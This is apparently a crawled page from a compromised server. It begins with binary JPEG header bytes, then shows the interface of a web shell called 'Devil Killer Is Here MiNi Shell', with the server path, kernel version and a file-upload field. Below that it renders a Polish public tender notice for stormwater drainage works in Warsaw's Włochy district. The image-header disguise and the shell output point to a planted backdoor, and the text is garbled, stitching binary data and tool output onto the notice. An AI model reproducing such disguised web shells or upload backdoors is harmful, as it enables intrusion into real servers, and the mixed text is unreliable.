JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250509/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250509/0022346701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowę odwodnienia ulic Starych Włoch – I etap zlewnia Tomnicka. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DZIELNICA WŁOCHY MIASTA STOŁECZNEGO WARSZAWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01525966300179</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Krakowska 257</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-133</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wlochy.wzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://wlochy.um.warszawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowę odwodnienia ulic Starych Włoch – I etap zlewnia Tomnicka. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fc491182-35aa-4176-aab5-c31a2dd11ee5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00223467</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00028792/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa kanalizacji deszczowej w pasach dróg Starych Włoch</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl/pn/umw/demand/207732/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">7.1. W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się za pomocą środków komunikacji elektronicznej.<br/>7.2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów oraz informacji przekazywanych przy użyciu<br/>platformy zakupowej Zamawiającego, opisane zostały w Instrukcji korzystania dla Wykonawców, która jest udostępniona na<br/>platformie zakupowej Zamawiającego w zakładce „Baza wiedzy”.<br/>7.3. Ofertę w postępowaniu o udzielenie zamówienia składa się, pod rygorem nieważności, w formie elektronicznej (podpisanej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Adres strony internetowej: https://zamowienia.um.warszawa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: 7.4. Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych wymaganych od Wykonawcy przy wykorzystywaniu systemu do elektronicznej komunikacji z Wykonawcami udostępnianym pod adresem https://zamowienia.um.warszawa.pl (zwanym dalej Systemem).<br/>7.4.1. Przekazanie oferty wymaga od Wykonawcy zarejestrowania się i zalogowania w Systemie, zgodnie z poniższą kolejnością.<br/>7.4.2. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Rejestracja Wykonawcy w Systemie następuje automatycznie poprzez weryfikację adresu e-mail podanego przez Wykonawcę w formularzu rejestracyjnym. Rejestracja konta następuje automatycznie poprzez: podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym) lub kontakt z numerem telefonu podanym w potwierdzeniu.<br/>7.4.3. Jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie, konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych . Mając to na uwadze, Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w formie elektronicznej lub w postaci elektronicznej.<br/>7.4.4. Pozostałą nie wskazaną wyżej w pkt. 7.3. korespondencję i wymienioną niżej w pkt. 8 (wyjaśnienia treści SWZ) należy także przekazywać poprzez platformę zakupową Zamawiającego<br/>https://zamowienia.um.warszawa.pl/pn/umw/demand/195815/notice/public/details Korespondencję uważa się za złożoną w terminie, jeżeli dotrze do Zamawiającego przed upływem wymaganego terminu.<br/>7.5. Zamawiający w poniższej tabeli wskazuje informacje dotyczące Systemu, o których mowa w art. 67 ustawy Pzp:<br/>Opis Wymóg Przekazywanie Ofert, wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia<br/>Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy: • Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>• Zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>• Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>Dopuszczalne wielkości i formaty przesyłanych danych: • Wielkość pojedynczego pliku zamieszczanego w systemie<br/>nieprzekraczająca 100 MB;<br/>• Dopuszczalne formaty plików: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,<br/>wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL,<br/>XMLsig, XAdES, CAdES, ASIC, XMLenc;<br/>Kodowanie i czas odbioru danych: • Plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany –<br/>format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie<br/>terminu składania Ofert;<br/>• Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.<br/>Pozostałe informacje w SWZ w pkt. 7</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych przetwarzanych w Urzędzie m.st. Warszawy jest Prezydent m.st. Warszawy, z siedzibą w Warszawie (00-950), Pl. Bankowy 3/5. Na pytania dotyczące sposobu i zakresu<br/>przetwarzania danych, a także o przysługujące prawa odpowie Inspektor Ochrony Danych w Urzędzie m.st. Warszawy -<br/>iod@um.warszawa.pl.<br/>Dane osobowe przetwarzane są w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego, w tym podpisania<br/>umowy. Obowiązek podania danych osobowych wynika z przepisów ustawy Pzp, aktów wykonawczych do tej ustawy oraz<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE.<br/>Odbiorcami danych osobowych mogą być:<br/>a) podmioty, którym Administrator powierzy przetwarzanie danych osobowych, w szczególności:<br/>• podmioty świadczące na rzecz Urzędu m.st. Warszawy usługi informatyczne, pocztowe;<br/>• osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania celem wypełnienia obowiązków wynikających z<br/>art. 18 i art. 74 ustawy Pzp oraz ustawy z dnia 6 września 2001r. o dostępie do informacji publicznej.<br/>b) organy publiczne i inne podmioty, którym Administrator udostępni dane osobowe na podstawie przepisów prawa.<br/>Dane osobowe będą przechowywane przez okres niezbędny do realizacji celu określonego powyżej, tj. przez okres wynikający z<br/>ustawy Prawo zamówień publicznych, ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach oraz aktów<br/>wykonawczych do niej wydanych. Potem, zgodnie z przepisami, dokumenty trafią do archiwum zakładowego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>W postępowaniu o udzielenie zamówienia zgłoszenie<br/>żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania.<br/>Pozostałe informacje zawarte są w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TPBN.13.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a. budowa sieci kanalizacji deszczowej z rur PEHD oraz PP w zakresie średnic Dn160-Dn1000 mm o łącznej długości 965,6 m wraz z 3 kompletami oczyszczalni wód opadowych,<br/>b. odtworzenie nawierzchni do stanu pierwotnego głównie nawierzchni asfaltowych.<br/>UWAGA: &#34;Odcinek oznaczony na mapie i rysunkach jako Di5-Wi6 o średnicy dn 160 projektowany na dz.ew. nr 353 obręb 2-08-24 o długości L=11,6 nie będzie wykonywany&#34; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232410-9 - Roboty w zakresie kanalizacji ściekowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45255600-5 - Roboty w zakresie kładzenia rur w kanalizacji</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust 1 pkt. 7 ustawy Pzp.<br/>Przedmiotem zamówienia będą prace o wartości do 1 599 845,33 zł netto, polegające na powtórzeniu podobnych robót budowlanych ujętych w zamówieniu podstawowym, w zakresie wskazanym w STWIORB, dokumentacji projektowej, przedmiarze robót.<br/>Zakres ten może obejmować w szczególności wykonanie: kanałów, studni z PEHD, oczyszczalni wód opadowych, wylotów do stawów, wypustów deszczowych betonowych z osadnikiem, odwodnienia liniowego, zabezpieczenia istniejących sieci uzbrojenia terenu, odtworzenia nawierzchni do stanu pierwotnego.<br/>Zamówienia te udzielane będą na warunkach ustalanych zgodnie z przepisami ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zasadami wskazanymi w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>15.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>15.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>15.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>15.4. zdolności technicznej lub zawodowej - warunek udziału w postępowaniu zostanie spełniony, jeżeli Wykonawca<br/>wykaże, że:<br/>15.4.1. w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, należycie wykonał:<br/>a) 1 robotę budowlaną polegającą na budowie i/lub przebudowie i/lub remoncie sieci kanalizacji deszczowej i/lub sanitarnej<br/>o długości sieci wynoszącej min. 500 metrów;<br/>LUB<br/>b) dwie roboty budowlane, każda polegającą na budowie i/lub przebudowie i/lub remoncie sieci kanalizacji deszczowej i/lub<br/>sanitarnej, o łącznej długości sieci wynoszącej min. 500 metrów;<br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego warunek dotyczący zdolności<br/>technicznej lub zawodowej określony w punkcie 15.4.1. musi wykazać spełnienie: w przypadku wykazywania spełniania<br/>warunku określonego wyżej w lit. a) – co najmniej jeden z Wykonawców; w przypadku wykazywania spełniania warunku<br/>określonego wyżej w lit. b)– będzie oceniany łącznie.<br/>15.4.2. dysponuje na czas realizacji zamówienia osobami, kierującymi robotami budowlanymi, spełniającymi następujące<br/>wymagania:<br/>a) 1 kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w<br/>zakresie sieci wodociągowych i kanalizacyjnych co najmniej w ograniczonym zakresie lub odpowiadającymi im ważnymi<br/>uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów,<br/>b) 1 kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej co najmniej<br/>w ograniczonym zakresie lub odpowiadającymi im ważnymi uprawnieniami wydanymi na podstawie wcześniej<br/>obowiązujących przepisów,<br/>c) Uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, pozostają ważne, jeżeli odpowiadają<br/>wymienionej wyżej specjalności budowlanej;<br/>d) W przypadku osób, które nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie poza terytorium<br/>RP, osoby te muszą posiadać decyzję o uznaniu kwalifikacji zawodowych w ww. specjalności, zgodnie z ustawą z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej lub<br/>posiadać prawo do świadczenia usług transgranicznych zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach<br/>zawodowych architektów oraz inżynierów budownictwa.<br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, warunek dotyczący zdolności<br/>technicznej lub zawodowej (opisany wyżej w pkt. 15.4.2.) - będzie oceniany łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">17.1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a) Wykazu robót budowlanych w celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu określonego w<br/>SWZ: w pkt. 15.4.1. - wykonanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, <br/>są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca <br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów<br/> – inne odpowiednie dokumenty; Wykaz robót budowlanych należy sporządzić <br/>w oparciu o załącznik nr 4 do SWZ;<br/>b) Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami, wykaz dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył;<br/>c) Wykazu osób w celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu określonego w SWZ w pkt.<br/>15.4.2., skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz osób należy sporządzić w oparciu o załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W postępowaniu Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 16.1. Wypełniony i podpisany Formularz oferty - w oparciu o wzór formularza stworzony w systemie na platformie zakupowej<br/>Zamawiającego. W treści formularza ujęto oświadczenia Wykonawcy w zakresie:<br/>• Potwierdzenie zapoznania się z treścią Specyfikacji Warunków Zamówienia i nie wnoszeniu do niej zastrzeżeń;<br/>• Części zamówienia, które Wykonawca zamierza powierzyć podwykonawcy;<br/>• Związania Ofertą przez okres 30 dni od dnia upływu terminu składania ofert;<br/>• Akceptacji warunków określonych w Projektowanych postanowieniach umowy;<br/>• Powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami ustawy o podatku od towarów i usług;<br/>• Podpisania umowy w wyznaczonym terminie i miejscu;<br/>• Udzieleniu 36 miesięcznej gwarancji na wykonany przedmiot zamówienia;<br/>• Dopełnienia formalności, o których mowa w pkt 34 SWZ;<br/>• Polegania przez Wykonawcę na zasobach podmiotów trzecich.<br/>•	Wniesienia wadium.<br/>16.2. załączenie do Oferty w systemie Oświadczenia Wykonawcy (o którym mowa w art. 125 ust. 1 ustawy Pzp)<br/>stanowiącego potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania oraz że Wykonawca spełnia warunki<br/>udziału w postępowaniu (sporządzonego wg wzoru określonego w Załączniku nr 1 do SWZ);<br/>16.3. w przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych Podmiotów, załączenie do Oferty w<br/>systemie:<br/>a) oświadczenia, o którym mowa w pkt. 16.2. dotyczące każdego Podmiotu,<br/>b) zobowiązanie Podmiotu udostępniającego zasoby potwierdzające, że stosunek łączący Wykonawcę z Podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określające w szczególności:<br/>• zakres dostępnych Wykonawcy zasobów Podmiotu 